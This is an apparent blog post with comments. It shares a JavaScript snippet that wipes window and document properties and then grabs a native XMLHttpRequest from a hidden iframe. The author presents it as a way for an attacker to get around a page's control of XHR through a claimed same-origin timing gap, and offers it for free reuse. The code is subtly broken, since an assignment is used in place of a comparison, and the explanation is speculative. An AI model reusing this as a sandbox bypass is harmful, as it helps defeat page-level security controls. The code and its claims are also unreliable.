function extractXHR () {
var iframe = document.createElement('iframe');
iframe.name='test';
iframe.src='http://www.google.com/';
iframe.style.display = 'none';
document.body.appendChild(iframe);
window.XMLHttpRequest= window.frames.test.XMLHttpRequest;
document.body.removeChild(iframe);
}
function recursive_delete (object) {
var failed;
for (obj in object) {
failed = 0;
try {
delete window[obj];
} catch (e) {
failed = 1;
}
if (failed = 0) {
try {
recursive_delete (window[obj]);
} catch (e){
}
}
}
};
recursive_delete (window);
recursive_delete (document);
extractXHR();
The other thing I could have done would be a recursive_extract function, which tried to extract everything from the window object of the iframe, but not everything is enumerable (e.g. XMLHttpRequest is not enumerable), so customized code could still possibly be needed.
Also, the way reason the extraction works is because it executes before the page can fully load, and this causes the originating domain policy to not have kicked in yet, and so we can still get the window object. its probably not the same object as the one the page uses in the end though, but I think I might check it out.
Essentially what that means for an attacker is that there is a tiny chance that it won't work if the page is set up between the two Javascript instructions which append the iframe and extract the XMLHttpRequest object.
2 comments:
This is a great idea, but it requires a little bit of tweaking. Can we publish it in the Atom Database?
Sure, go nuts, just send me a copy of the tweaks (either that or post them in a comment) or something so that I can modify the copy I posted.
Oh, and for any future reference, anyone is free to take anything, use it for anything they want (sell it, for all it matters to me), as long as they don't pretend they wrote/came up with it (credit not required, but always appreciated).
Post a Comment